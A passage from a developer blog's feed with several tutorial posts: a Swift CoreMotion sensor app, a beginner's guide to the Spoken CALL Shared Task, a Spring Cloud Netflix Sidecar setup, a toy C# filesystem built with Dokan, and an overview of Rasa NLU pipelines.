Usually, the tourists are very busy, keeping their fascination ratio high. This accounts for a steady flow throughout the whole museum. But some things are especially magnetic to them since they would make for a good background on a photo. As a museum manager, we would like to measure, which particular spots are especially magnetic for the tourist (you see where I am going with this?). To do so, we come up with a brilliant idea – a magnetometer. We know, that if some especially magnificent fish is going to swim by on one side of the arched fish tank, the tourists are going to want to make a picture. Instead of building a steady flow in the middle of our path, they are going to get attracted to one side of it, to get their photo and only then pass by. People are heavy, so there is going to be a weight difference between the two sides of the path, which we could measure and translate into the magnetic power of a spot. The stronger the attraction – the more weight difference we will be registering. That’s like tourist attraction management 101. But other than learning how to pursue an alternative career in tourism, you have just figured out the way magnetometers work. Electrons with tiny cameras are getting attracted by magnetic fields, and gather closer to the source of attraction, on one side of the conductor (our path segment). This causes a measurable weight difference between the left and right parts of the conductor (voltage). The whole thing is called the Hall effect, so now you can also google it, and I can move on to the next sensor.

Barometer

Barometers are some commonly used sensors, which you might have come across in real life. Especially if you hang out on ships a lot. Or around people who… like weather, I guess? The purpose of a barometer is to measure atmospheric pressure. They can take many forms, one of the simplest being that of two conjoined glass containers with water inside, only one of which is sealed. The other one is a thin spout which rises above the water level. The atmospheric pressure is measured based on the level of water in the spout.

Now that I’m done paraphrasing the Wikipedia page on barometers we can move to the way the sensor works inside your phone. Instead of containers with water or, god forbid, mercury, a membrane sensitive to pressure is used. The extent, to which it gets distorted is measured to calculate the atmospheric pressure, which causes the deformation. That’s it, I guess barometers are only fascinating to weather people.

Gyroscope

Last but not least is the gyroscope. This is a really fancy one, just look at it. It looks like it belongs on an oak table in the office of some big corporate boss from the early 2000’s. It can do some pretty impressive tricks as well, just check this video out. Instead, it is consigned to oblivion behind the cover of your phone.

Of course, the gyroscope inside your device doesn’t have all these rings orbiting around it in different directions. Instead, it looks a lot like an accelerometer, if you still remember what that was. Only this time, the body is continually moving back and forth (oscillating, if you are in a search for the fancy word of the week). The moment the device is rotated on an axis perpendicular to the plate it is fixated on, it is going to move along the third axis. Because physics. The movement is measured and can be used to calculate the device orientation. To have a picture of the sensor in your head, watch this video.

Up! we go

If you want to get to know Core Motion, learning by doing is the way to go. That is why today we are going to be building a cheesy little app, which uses the accelerometer inside our iPhone to distinguish top from bottom. If this is your first iOS app and you need some help getting started, you should probably make your way through this tutorial first. But if you are as far in your iOS developer career, as being comfortable with creating a new single-screen project in Xcode, you are all set for what’s coming up next.

Preparing the UIView

In our app, we want to be able to point upwards in the direction of the sky however the device is rotated. To do so, we need an indicator of some kind. I am using an image, so the first thing I am going to be setting up in my ViewController is a UIImageView object. I do want it to fill my whole screen, so the width and height of the frame are going to correspond to the dimensions of the device screen, and the image itself is going to be placed into that frame with the .scaleAspectFit option. To make the image show, I am going to add it as a subview of the current controller’s view. If we ran our app at this point, we would see a static full-screen image of whatever we’ve chosen to indicate the direction.

class ViewController: UIViewController {
    private var upView: UIImageView!    

    func showUp() {
        let screenSize: CGRect = UIScreen.main.bounds

        upView = UIImageView(frame: CGRect(x: 0, y: 0, width: screenSize.width, height: screenSize.height))
        upView.image = #imageLiteral(resourceName: "bloons")
        upView.contentMode = .scaleAspectFit
        
        self.view.addSubview(upView)
    }
}

Getting CoreMotion updates

The communication with the CoreMotion framework is handled by the CMMotionManager. After creating an instance of this class, we can ask it for the motion updates and even set up the intervals we want to receive the updates in. To get the updates, we need to give our motion manager an OperationQueue to send its data to. This needs to be done in case we are going to be flooded with motion information, so much so, that our device stops handling the events occurring in the UI. To prevent this from happening, we could make the motion manager send all the updates to another thread. This way, our app would stay responsive for the user, even though it is receiving a large number of updates in the background. In the simplified example below I am using one and the same Queue for both, motion information and the UI work.

import CoreMotion
class ViewController: UIViewController {
    private var motionManager: CMMotionManager!
    private var upView: UIImageView!

    func setupCoreMotion() {
        motionManager = CMMotionManager()
        motionManager.deviceMotionUpdateInterval = 0.05
        startAsyncDeviceMotionUpdates()
    }

    fileprivate func startAsyncDeviceMotionUpdates() {
        motionManager.startDeviceMotionUpdates(to: OperationQueue.current!, withHandler: {
            (deviceMotion, error) -> Void in
            if(error == nil) {
                self.handleDeviceMotionUpdates(deviceMotion)
            } else {
                // handle error
            }
        })
    }
}

The second parameter our motion manager needs is a method, which will be invoked every time new motion information comes in. At this point, we can also take care of possible errors, which could occur while retrieving data from the sensors. Handling the motion updates is going to be our next task.

Handling the updates

All the motion data we can retrieve is held by a CMDeviceMotion object we receive in each update. All we need to do is figure out the rotation axis we want to be calculating (since there are 3 different directions you can rotate your iPhone in), apply the correct formula and transform our image. Let’s take a look at the axis first.

The picture above can be found in Apple documentation and shows how the rotation types are going to be referred to. In this tutorial, we will only cover the rotation on the Z-axis (yaw). This is going to take care of pointing to the sky as long as we are holding our device perpendicular to the ground. You can find the detailed mathematical explanation of the atan2 formula we are applying to calculate yaw, as well as its equivalents for roll and pitch, here.

import CoreMotion
class ViewController: UIViewController {
    private var motionManager: CMMotionManager!
    private var upView: UIImageView!

    fileprivate func handleDeviceMotionUpdates(_ deviceMotion: CMDeviceMotion?) {
        if let gravity = deviceMotion?.gravity {
            let rotationDegrees = atan2(gravity.x, gravity.y) - Double.pi
            rotate(with: rotationDegrees)
        }
    }
    func rotate(with degrees: Double) {
        upView.transform = CGAffineTransform(rotationAngle: CGFloat(degrees))
    }
}

The very last step towards building our mini-app is applying the calculated rotation degrees to the image we have added to our screen in the first step. To do so, I am using the CGAffineTransformation, previously converting a double value into a CGFloat which is going to be passed as an argument, while initializing the transformation. Don’t forget to wire both, the image creation and the motion manager set up in the viewDidLoad method. This way, all the elements are going to be initialized right after your View has loaded.

class ViewController: UIViewController {
    private var motionManager: CMMotionManager!
    private var upView: UIImageView!

    override func viewDidLoad() {
        super.viewDidLoad()
        showUp()
        setupCoreMotion()
    }
}

That’s it. Build, run and see the result for yourself! Here is what I’ve got:

I hope you’ve enjoyed our little journey into the functionality of CoreMotion and all kinds of sensors your device is stuffed with. Experiment with it for yourself and let’s learn from each other.

Dannynator.

]]>
Quickstart: Get ready for 3rd Spoken CALL Shared Task https://craftcoders.app/quickstart-get-ready-for-3rd-spoken-call-shared-task/ Mon, 03 Sep 2018 20:40:20 +0000 https://craftcoders.app/?p=575 Read More]]> These days is Interspeech conference 2018 where I’m invited as a speaker and as they write on their website

Interspeech is the world’s largest and most comprehensive conference on the science and technology of spoken language processing.

Coming Wednesday the results and systems of 2nd Spoken CALL Shared Task (ST2) are presented and discussed in a special session of the conference. Chances are that these discussions will lead to a third edition of the shared task.

With this blog post, I want to address all newcomers and provide a short comprehensible introduction to the most important challenges you will face if you want to participate at Spoken CALL shared task. If you like “hard fun”, take a look at my research group’s tutorial paper. There will be unexplained technical terms and many abbreviations combined with academical language in a condensed font for you 🙂

What is this all about?

The Spoken CALL Shared Task aims to create an automated prompt-response system for German-speaking children to learn English. The exercise for a student is to translate a request or sentence into English using voice. The automated system should ideally accept a correct response or reject a student response if faulty and offer relevant support or feedback. There are a number of prompts (given as text in German, preceded by a short animated clip in English), namely to make a statement or ask a question regarding a particular item. A baseline system (def) is provided by the website of the project. The final output of the system should be a judgment call as to the correctness of the utterance. A wide range of answers is to be allowed in response, adding to the difficulty of giving automated feedback. Incorrect responses are due to incorrect vocabulary usage, incorrect grammar, or bad pronunciation and quality of the recording.

How to get started

A day may come when you have to dig into papers when you have to understand how others built their systems, but it is not this day. As someone who is new to the field of natural language processing (NLP) you have to understand the basics of machine learning and scientific work first. Here are the things we will cover with this post:

  1. Machine learning concepts
  2. Running the baseline system
  3. Creating your own system

Machine learning concepts

When my research group and I first started to work on the shared task we read the papers and understood barely anything. So, we collected all the technical terms we didn’t understand and created a dictionary with short explanations. Furthermore,  we learned different concepts you should take a look at:

Training data usage

For the 2nd edition, there was a corpus (=training data) containing 12,916 data points (in our case speech-utterances), that we can use to create a system. A machine learning algorithm needs training data to extract features from it. These features can be used for classification and the more varying data you have, the better the classification will be.


But you can’t use all that data for training. You have to keep a part of your data points aside so you can validate that your system can classify data it has never seen before. This is called validation set and the other part is called training set. A rookie mistake (which we made) is to use the test set as validation set. The test set is a separate corpus, which you should use at the very end of development only to compare your system with others. For a more detailed explanation take a look at this blog post.

If you don’t have a separate validation set (like in our case) you can use cross-validation instead, which is explained here. Furthermore, you should try to have an equal distribution between correct and incorrect utterances in your sets. If this is not the case, e.g. if you have 75% correct utterances and 25% incorrect utterances in your training set, your system will tend to accept everything during validation.

Metrics

Metrics are used to measure how well a system performs. They are based on the system’s results, which generally displayed as a confusion matrix:

 

  • TP: True positive (a correct utterance has been classified as correct?)
  • FP: False positive (a faulty utterance has been classified as correct?)
  • TN: True negative (a faulty utterance has been classified as incorrect?)
  • FN: False negative (a correct utterance has been classified as incorrect?)

Based on the confusion matrix there are four often used metrics: Accuracy, Precision, Recall and F1. When to use which is explained thoroughly here. For the shared task, there’s a special metric called D-score. It is used to evaluate the system’s performance respecting a bias to penalize different classification mistakes differently. More details about D-score can be found in our tutorial paper.

Running the baseline system

If you open the data download page you can see an important differentiation: On the one hand you can download the speech processing system (also asr system or Kaldi system) and on the other hand you can download the text processing system. Basically, you have to independent baseline systems you can work on.

For the asr system to work you have to install several applications. This is one of the pain points. Be careful here! Kaldi is the speech processing framework our baseline system is built on. The things you need for Kaldi are Python, Tensorflow, CUDA, and cuDNN. The latter two are for Nvidia graphics cards. cuDNN depends on CUDA so check out that the versions you install match. Furthermore, Kaldi and Tensorflow should be able to use the installed Nvidia software versions. To find out if everything went well you can try Kaldi’s yes/no example as described in:

kaldi/egs/yesno/README.md

The text processing system can be run using just python and is pretty minimal 😉 At least during ST2 it was. You can either check if there’s a new official baseline system for text processing, or you can use one of our CSU-K systems as a basis:

https://github.com/Snow-White-Group/CSU-K-Toolkit

Creating your own system

To create your own system you first have to decide whether you want to start with text- or speech processing. If you are a complete beginner in the field, I would advise you to start which text processing because it is easier. If you want to start with speech processing take a look at Kaldi for dummies, which will teach you the basics.

The Kaldi system takes the training data audio files as input and produces text output which looks like this:

user-008_2014-05-11_17-57-14_utt_015 CAN I PAY BY CREDIT CARD 
user-023_2014-11-03_09-47-09_utt_009 I WANT A COFFEE 
user-023_2014-11-03_09-47-09_utt_010 I WOULD LIKE A COFFEE 
user-023_2014-11-03_09-47-09_utt_011 I WANT THE STEAK 

The asr output can be used as text processing input. The text processing system produces a classification (language: correct/incorrect, meaning: correct/incorrect) from the given sentence as output.

Now you should be at a point where you understand most of the things described in the papers, except for the concrete used architectures and algorithms. Read through them to collect ideas and dig deeper into the things that seem interesting to you 🙂 Furthermore here are some keywords you should have heard of:

  • POS Tagging, dependency parsing
  • NER Tagging
  • Word2Vec, Doc2Vec
  • speech recognition
  • information retrieval

I hope you are motivated to participate and if so, see you at the next conference 🙂

Greets,

Domi

 

 

]]>
Spring Cloud Netflix Sidecar Tutorial https://craftcoders.app/spring-cloud-netflix-sidecar-tutorial/ Mon, 20 Aug 2018 21:38:21 +0000 https://craftcoders.app/?p=538 Read More]]> Introduction

Hey guys,
this week’s post is about Microservices created with the various Spring Cloud frameworks and how to include services written in non-JVM programming languages into the Spring Cloud ecosystem using Spring Cloud Netflix Sidecar. Please be aware that this tutorial is specifically written for people who know the architectural style of Microservices and are creating applications using the various Spring Cloud frameworks or plan to do so.

If you don’t know what Microservices are, please read the excellent blog post from Martin Fowler regarding Microservices. Basically every book, article or scientific paper (and my bachelor thesis) about this architectural style is based on this blog post, so yeah, it’s a pretty good read.


The problem I faced

I am currently in the process of writing my bachelor thesis and therefore implemented a prototypical application using the Microservice architectural style. Because I’m a Java guy and know the Spring framework, I decided to implement the application using the Spring Cloud ecosystem. I use an Eureka server as a service registry. Furthermore, I implemented several Spring Boot services and was able to register them to Eureka with the use of an annotation and a little bit of configuration.

It turned out that I had to implement one of the services making up my application with PHP (yikes!) because a library I had to use is not available in Java. Because I only had two weeks for the implementation of my prototype I certainly wouldn’t have been able to write a Java implementation of the library. Therefore I decided to create a PHP microservice with the help of Lumen

Furthermore I didn’t want to miss out on the fancy features of my service registry like client-side load-balancing and the decoupling of my service providers from my consumers. After a bit of research I found the documentation of the Eureka HTTP API. I got discouraged at the sight of the XSD I had to implement in my PHP service to register it with Eureka. I really did not want to implement the various REST operations manually into my service because my PHP knowledge is very limited and I have never used Lumen before.

I was on the verge of giving up when I found Spring Cloud Netflix Sidecar. It promised to let me register my service written in PHP with Eureka using one annotation and a little configuration, just like in my other services written with Spring boot.


Spring Cloud Netflix Sidecar

Spring Cloud Netflix Sidecar is a subproject of Spring Cloud Netflix and is inspired by the Netflix Prana project. A sidecar service is basically yet another Spring boot application that runs on the same host as your non-JVM service. It registers itself to your service registry with a defined application name and frequently checks the health of your non-JVM service via a REST call. The sidecar is also able to forward calls from other services of your application. By using a sidecar application you only have to implement minimal changes to your non-JVM application, so it’s also great for legacy projects.


A working example

For you to get the hang of Spring Cloud Netflix Sidecar I created a very minimalistic project consisting of a Eureka server, a Lumen service capable of doing nothing and the corresponding sidecar application. You have to have docker and docker-compose installed to run this example. In order to run the example application, clone the project from our GitHub repository. After that change into its directory and type
docker-compose up -d into your console. This command pulls all necessary images from our DockerHub registries and starts the containers. After everything has started, you can access http://localhost:8761/, which is the Eureka dashboard, and see the lumen service registered.

You can stop the container containing the lumen service by typing docker stop *lumen-service* and the status of the application on your Eureka dashboard should change to DOWN a few seconds later. That is because the sidecar application’s heartbeats are not answered by your lumen service, obviously.


How to set this up

Sadly, sidecar isn’t available in Spring Initializr, so you have to manually add following maven dependency to your Spring Boot application:

<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-netflix-sidecar</artifactId>
</dependency>

After adding the dependency you can annotate your main class with the @EnableSidecarannotation.

It would not be a proper Spring application if you wouldn’t have to create an application.yml and add all the necessary configuration, so let’s do this.

server:
  port: 5678

spring:
  application:
    name: lumen-service

eureka:
  client:
    serviceUrl:
      defaultZone: ${EUREKA_URI:http://localhost:8761/eureka}
  instance:
    preferIpAddress: true

sidecar:
  port: ${SIDECAR_PORT:8000}
  health-uri: ${SIDECAR_HEALTH_URI:http://localhost:8000/health}

We have to tell the sidecar application on which port to run and what it’s name is. Note that the spring.application.name property is the one getting displayed on your Eureka dashboard. Furthermore we have to tell the application where the registry server is located.

The important configuration are the

  • sidecar.port: This is the port your non-JVM application is listening on.
  • sidecar.health-uri: This is the REST endpoint of your non-JVM where you implemented a health check.

The configured health check REST endpoint should return a JSON document looking like this:

{
   "status": "UP"
}


Implementing such a simple health check in Lumen is pretty easy, just add the following code snippet in your web.php located in the routes folder of your project:

$router->group(['prefix' => 'health'], function () use ($router) {

    $router->get('', function () {
        return response()->json(['status' => 'UP'])
    });

});

And that’s all you have to change in your non-JVM application to get all the advantages of the Spring Cloud ecosystem.


Roundup

In this post I showed you how to include a non-JVM application in your Spring Cloud ecosystem. This can be done by creating a Spring boot application with the sidecar dependency and some configuration and adding a simple health check to your service.


I hope I was able to help some people with this post!

Best regards

Leon

]]>
Do it yourself filesystem with Dokan https://craftcoders.app/do-it-yourself-filesystem-with-dokan/ Mon, 13 Aug 2018 08:00:00 +0000 https://craftcoders.app/?p=498 Read More]]> What’s up guys?! A week has passed and its time for a new Blogpost. This time I am gonna give you a small introduction to Dokan. You don’t have a clue? Never heard of Dokan before? No problem… I haven’t either. But in the life as a student there comes the moment where one must write his Bachelor thesis. No matter how much you procrastinate. As a part of my thesis, I had to write a filesystem and this is exactly where Dokan came into play to save my ass.

WHAT IN THE HELL IS DOKAN?!

So let’s start from the beginning. As I mentioned before, I had to implement my own Filesystem. Yeah, basically you could write your own filesystem driver. But that would be like writing a compiler to print a simple “Hello World”. But there is a really cool concept which is heavily used in the Linux world. Its called FUSE (Filesystem in Userspace). With FUSE everyone is able to create their own Filesystem without writing a Kernel component. FUSE empowers you to write a Filesystem in the same manner as a user-mode application. So what is Dokan?! Dokan is simply FUSE for Windows. It is as simple as that. You could even use Dokan to run a filesystem which has been written with FUSE under windows.

Okay cool… How does this magic work?!

So you are right. Without a kernel component, there is no way to implement a filesystem. But you don’t have to write it, because Dokan did. So Dokan ships with two components: (1) dokan1.sys alias “Dokan File System Driver” (2) dokan1.dll which is used in a “Filesystem Application”. So take a look at the picture below

First, a random Application is running. It could be Word, Visual Studio, IntelliJ or your web browser rendering a website that is trying to write a virus into a file ?. Let’s assume it is the web browser. If the web browser tries to write some content x to a file y its gonna fire a I/O-request.
This I/O-request is processed by the Windows I/O Subsystem. Note that by passing the I/O-request to the Windows I/O Subsystem we leave the user mode and enter the kernel mode of Windows (this is 1 in the picture above).

Secondly, the Windows I/O Subsystem will delegate the I/O-request to a Driver responsible for the filesystem. In our case that would be the Dokan File System Driver. Which is dokan1.sys. Please note that we did not write any code for that driver, it just needs to be installed (this is 2 in the picture above).

Third, our Filesystem Application which has registered itself in the Dokan File System Driver gets notified about the I/O-Request. By implementing the interface which comes in the dokan1.dll, our Filesystem Application is now responsible for computing the I/O-Request. Whatever has to be done needs to be done by our Filesystem Application. And as you might already guess: Yes this is the part we need to write! The Filesystem Application than invokes a callback function and the Dokan File System Driver is back in line (this is 3-4 in the picture).

Last but not least, the Dokan File System Driver receives the I/O-Response created by our Filesystem Application and invokes the callback routine of the Windows I/O Subsystem. The Windows I/O Subsystem than forwards the result to the application which created the I/O-Request. In our case the Web browser with the porno site (this is 5-6 in the picture).

Just do it! Writing a simple Filesystem

Scope

Okay, we are actually not going to implement a complete Filesystem ?. That would be too much for a blog post. We are doing something simple. Let’s create a Filesystem that contains a fake file which can be read with a editor.

Warmup: Preparations

As I already mentioned before, we need to install the Dokan File System Driver. It is used as a proxy for our Filesystem Application. You can get the latest Version here.
As soon as we have the Dokan File System Driver installed, we can create a blank C# Console Application. Please note that you could also use Dokan with other languages. As always, you can find my solution on GitHub. After we’ve created the Console Application, which will be our Filesystem Application, we need to add the Dokan library (dokan1.dll). Luckily there is a NuGet package.
Everything settled? Let the game begin!

Mount the FS

First of all, we need to implement the IDokanOperations from the dokan1.dll. Since this is for learning purposes I didn’t create a second class. So everything is in one class. In the Main()-Method I create a new instance of the class and mount the Filesystem.

static void Main(string[] args)
{
    var m = new StupidFS();
    // mounting point, dokan options, num of threads
    m.Mount("s:\\", DokanOptions.DebugMode, 5);
}

1..2..3.. and it crashed! What happened? As you can see from the Console output, several I/O-request failed. First, the GetVolumeInformation-Operation failed and then the Mounted-Operation. They failed because we did not implement them yet. But it’s simple: in the GetVolumeInformation-Request we just need to provide some information for the OS. Basically, this is just some Meta information for our filesystem. Like its name, how long a path can get and which feature it supports. Let’s implement it:

[...]

public NtStatus GetVolumeInformation(...)
{
       volumeLabel = "CraftCode Crew";
       features = FileSystemFeatures.None;
       fileSystemName = "CCCFS";
       maximumComponentLength = 256;

       return DokanResult.Success;
}

[...] 

public NtStatus Mounted(DokanFileInfo info)
{
       return DokanResult.Success;
}

But it won’t work yet. We also need to “implement” the CreateFile-Methode:

public NtStatus CreateFile(...)
{
      return DokanResult.Success;
}

Did you notice how every method returns a NtStatus? This status indicates wherever a request has failed (and why) or succeeded. You might wonder why we need to return a Success in the CreateFile-Methode for mounting the filesystem. As soon as we mount the filesystem, it tries to create some fileproxis. If we throw an exception, our filesystem ends up in a bad state.

Faking a file

Whenever the filesystem has to list files there a two possible request: FindFilesWithPattern and FindFiles. Luckily, we just need to implement one and suppress the other one. We are going to implement the FindFiles-Methode. Therefore we will return a DokanResult.NotImplemented in FindFilesWithPattern, so whenever the filesystem gets this request it will be rerouted to FindFiles.
One of the parameters in FindFiles is a list of FileInformation objects. We are just going to fake one item and add it to a list which will be set to the parameter files.

public NtStatus FindFilesWithPattern(...)
{
   files = null;

   return DokanResult.NotImplemented;
}

public NtStatus FindFiles(...)
{
   var  fileInfo = new FileInformation
   {
         FileName = "carftCodeCrew.txt",
         CreationTime = DateTime.Now,
         LastAccessTime = DateTime.Now,
         LastWriteTime = DateTime.Now,
         Length =  FileContent.Length * 8,
   };

   files = new List<FileInformation> {fileInfo};

   return DokanResult.Success;
}

And we did it! Our filesystem now shows one file!
Did you notice FileContent? It’s just a global string containing the content of our textfile.

Reading with the good old Editor

Let’s read data from our filesystem! We want to read the string FileContent with the good old Editor. So, first of all, we need to make changes to the CreateFile-Methode. Whenever we need to open a file or dir, the CreateFile-Methode gets invoked. We need to provide the DokanFileInfo object with a context. In case of a read operation, the context is a stream where the data is located. Since we want to read a string, we are going to use a MemoryStream.

public NtStatus CreateFile(...)
{
     if (fileName.Equals(@"\carftCodeCrew.txt"))
     {
       info.Context = new MemoryStream(System.Text.Encoding.ASCII.GetBytes(FileContent));
     }

       return DokanResult.Success;
}

We are close but not quite there. When an application like Editor tries to open a file it also wants to read the meta information of the file. For example, to set the window title. Therefore we need to implement the GetFileInformation-Methode. Since our filesystem just has one file it is really trivial:

public NtStatus GetFileInformation(...)
{
     fileInfo = new FileInformation
     {
            FileName = "carftCodeCrew.txt",
            Attributes = 0,
            CreationTime = DateTime.Now,
            LastAccessTime = DateTime.Now,
            LastWriteTime = DateTime.Now,
            Length =  FileContent.Length * 8,
     };

     return DokanResult.Success;
}

Now we are really close ? We just need to implement the ReadFile-Methode(). In this method, we get the Stream from the DokanFileInfo.Context and then read the bytes that have been requested. It is really as simple as this.

public NtStatus ReadFile(...)
{
      bytesRead = 0;

      if (info.Context is MemoryStream stream)
      {
          stream.Position = offset;
          bytesRead = stream.Read(buffer, 0, buffer.Length);
      }

      return DokanResult.Success;
}

The lovely CraftCodeCrewFS

]]>
Rasa Core & NLU: Conversational AI for dummies https://craftcoders.app/rasa-core-nlu-conversational-ai-for-dummies/ https://craftcoders.app/rasa-core-nlu-conversational-ai-for-dummies/#respond Mon, 23 Jul 2018 10:47:42 +0000 https://craftcoders.app/?p=395 Read More]]> AI is a sought-after topic, but most developers face two hurdles that prevent them from programming anything with it.

  1. It is a complex field in which a lot of experience is needed to achieve good results
  2. Although there are good network topologies and models for a problem, there is often a lack of training data (corpora) without which most neural networks cannot achieve good results

Especially in the up-and-coming natural language processing (nlp) sector, there is a lack of data in many areas. With this blogpost we are going to discuss a simple yet powerful solution to address this problem in the context of a conversational AI. ?

Leon presented a simple solution on our blog a few weeks ago: With AI as a Service reliable language processing systems can be developed in a short time whithout having to hassle around with datasets and neural networks. However, there is one significant drawback due to this type of technology: Dependence on the operator of the service. On one hand the service can be linked with costs, furthermore the own possibly sensitive data has to be passed on to the service operator. Especially for companies this is usually a show stopper. That’s where Rasa enters the stage.

The Rasa Stack

Rasa is an open source (see Github) conversational AI that is fully free for everyone and can be used in-house. There is no dependence on a service from Rasa or any other company. It consists of a two-part stack whose individual parts seem to perform similar tasks at first glance, but on a closer look you see that both try to solve their own problems. Rasa NLU is the language understanding AI we are going to dig deeper into soon. It is used to understand what the user is trying to say and which additional information he provides. Rasa Core is the context-aware AI for conversational flow, which is used to build dialog systems e.g. chatbots like this. It uses the information from Rasa NLU to find out what the user wants and what other information is needed to achieve it. For example, for a weather report you need both the date and the place.

Digging deeper into Rasa NLU

The following paragraphs deal with the development of language understanding. Its basics are already extensively documented, which is why I will keep this brief. Instead, the optimization possibilities are to be presented more extensively. If you have never coded something using Rasa, it makes sense to work through the restaurant example (see also Github code template) to get a basic understanding of the framework.

The processing pipeline is the core element of Rasa NLU. The decisions you make there have a huge influence on the system’s quality. In the restaurant example the pipeline is already given: Two NLU frameworks spaCy and skLearn are used for text processing. Good results can be achieved with very few domain-specific training data (10 – 20 formulations per intent). You can get this amount of data easily using Rasa Trainer. It is so small because transfer learning combines your own training data with spaCy’s own high-quality models to create a neural net. Besides spaCy, there are other ways to process your data, which we will discover now!

Unlock the full potential

Instead of spaCy you can also use MIT Information Extraction. MITIE can also be used for intent recognition and named entity recognition (NER). Both backends perform the same tasks and are therefore interchangeable. The difference lies in the algorithms and models they use. Therefore you are not bound to only spaCy or mitie, but you can also use scikit-learn for intent classification.

Which backend works best for your project is individual and should be tested. As you will see in the next paragraph, the pipeline offers some precious showpieces that work particularly well. The already included cross validation should be used to evaluate the quality of the system.

The processing pipeline

You should understand how the pipeline works to develop a good system for your special problem.

  1. The tokenizer: is used to transform input words, sentences or paragraphs into single word tokens. Hence, unnecessary punctuation is removed and stop words can also be removed.
  2. The featurizer is used to create input vectors from the tokens. They can be used as features for the neural net. The simplest form of an input vector is one-hot.
  3. The intent classifier is a part of the neural net, which is responsible for decision making. It decides which intent is most likely meant by the user. This is called multiclass classification.
  4. Finally named entity recognition can be used to extract information like e-mails from a text. In terms of Rasa (and dialogue systems) this is called entity extraction.

In the following example (from Rasa) you can see how the single parts work together to provide information about intent and entity:

{
    "text": "I am looking for Chinese food",
    "entities": [
        {"start": 8, "end": 15, "value": "chinese", "entity": "cuisine", "extractor": "ner_crf", "confidence": 0.864}
    ],
    "intent": {"confidence": 0.6485910906220309, "name": "restaurant_search"},
    "intent_ranking": [
        {"confidence": 0.6485910906220309, "name": "restaurant_search"},
        {"confidence": 0.1416153159565678, "name": "affirm"}
    ]
}

As mentioned by Rasa itself intent_classifier_tensorflow_embedding can be used for intent classification. It is based on the StarSpace: Embed All The Things! paper published by Facebook Research. They present a completely new way for meaning similarity, which generates awesome results! ?

For named entity recognition you have to make a decision: Either you use common pre-trained entities, or you use custom entities like “type_of_coffee”. Pre-trained entities can be one of the following:

  • ner_spaCy: Places, Dates, People, Organisations
  • ner_duckling: Dates, Amounts of Money, Durations, Distances, Ordinals

Those two algorithms perform very well in recognition of the given types, but if you need custom entities they perform rather bad. Instead you should use ner_mitie or ner_crf and collect some more training data than usual. If your entities have a specific structure, which is parsable by a regex make sure to integrate intent_entity_featurizer_regex to your pipeline! In this Github Gist I provided a short script, which helps you to create training samples for a custom entity. You can just pass some sentences for an intent into it and combine it with sample values of your custom entity. It will then create some training samples for each of your sample values.

That’s it 🙂 If you have any questions about Rasa or this blogpost don’t hesitate to contact me! Have a nice week and stay tuned for our next post.

Greets,
Domi

]]>
https://craftcoders.app/rasa-core-nlu-conversational-ai-for-dummies/feed/ 0